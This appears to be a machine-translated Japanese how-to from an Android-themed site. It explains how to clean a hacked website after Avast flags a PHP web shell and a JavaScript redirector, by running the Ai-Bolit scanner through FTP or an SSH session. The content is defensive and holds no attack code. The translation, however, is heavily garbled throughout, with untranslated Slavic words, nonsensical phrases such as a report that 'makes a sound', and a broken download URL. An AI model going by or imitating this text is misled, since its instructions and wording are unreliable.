アバストがフォルダをスキャンしてWebサイトファイルを探したため、次の2つのスクリプトウイルスが検出されました。

  • php-shell-jv
  • js-redirector-fc

index.phpファイルは、攻撃的なコードで構成されています。

javascriptファイル「ui.datepicker_old.js」には、スクリプトの一番下に不安定なコードがあります。 このコードを確認する必要があります。

Ai-Bolitの助けを借りてウイルスからサイトをクリーンアップします。

FTP方式。

1.Aibolitスクリプトを使用してアーカイブをキャプチャする ローカルコンピュータヨガを開梱します。

2. FileZillaクライアントの助けを借りて、ftp経由で参加します

3.アーカイブファイルの解凍は、サイト/ home / your site/public_htmlのメインディレクトリに配置されます。

4.スクリプトhttp://your domain/ai-bolit.phpを実行します

5.名前ファイルがメインディレクトリに名前で作成されます AI-BOLIT-REPORT.html

スクリプトが起動されるとすぐに、きれいな白い画面が表示され、ホスティングサーバーのphpバージョンはAibolitに適していません。

尊敬!ディレクトリ内のすべてのサイトを再帰的に実行する必要があります。zavantazhuemoスクリプトを/home/domains/または/home/フォルダーから取得すると、Ai-Bolitがすべてのフォルダーを再帰的に処理します。そのように聞こえますが、再確認する方が簡単だと思います。 1つのドメイン。

コンソールオプション(SSH)

1.Puttyプログラムまたは別のコンソールプログラムを実行します。

2.ホストとパスワードでサーバーに接続します。

3.コマンドを使用してサイトのメインディレクトリに移動します cd / home / your login / your site / public_html /

4.コマンドを使用してスクリプトをキャプチャします wget http://www..zip

5.開梱 zipアーカイブチーム 20160904_112415ai-bolit.zipを解凍します

6.スクリプトを実行します php ai-bolit.php

打ち上げ用 バックグラウンドモードコマンドに勝つ: screen -d -m php ai-bolit.php

7.スクリプトがまだチェックされていることを確認し、音を出します。 AI-BOLIT-REPORT.html"サーバー上。

また、サーバーに5.3より低いphpがインストールされているため、Aibolitは許しを示し、スキャンを開始しません。 私の心はサイトをダウンロードして私のサーバー上でそれを修正する機会がありました。

サーバー上にサウンドファイルが作成されたら、それをコンピューターにダウンロードして、最適なブラウザー(Chrome、Firefoxなど)を確認できます。

vartoの前に、「Shkidlivyスクリプト」に関する呼び出しに注意してください。まあ、qiファイルを注意深く見るか、クリーンアップしましょう。 手動で私が誓う方法。

©2022androidas.ru-Androidのすべて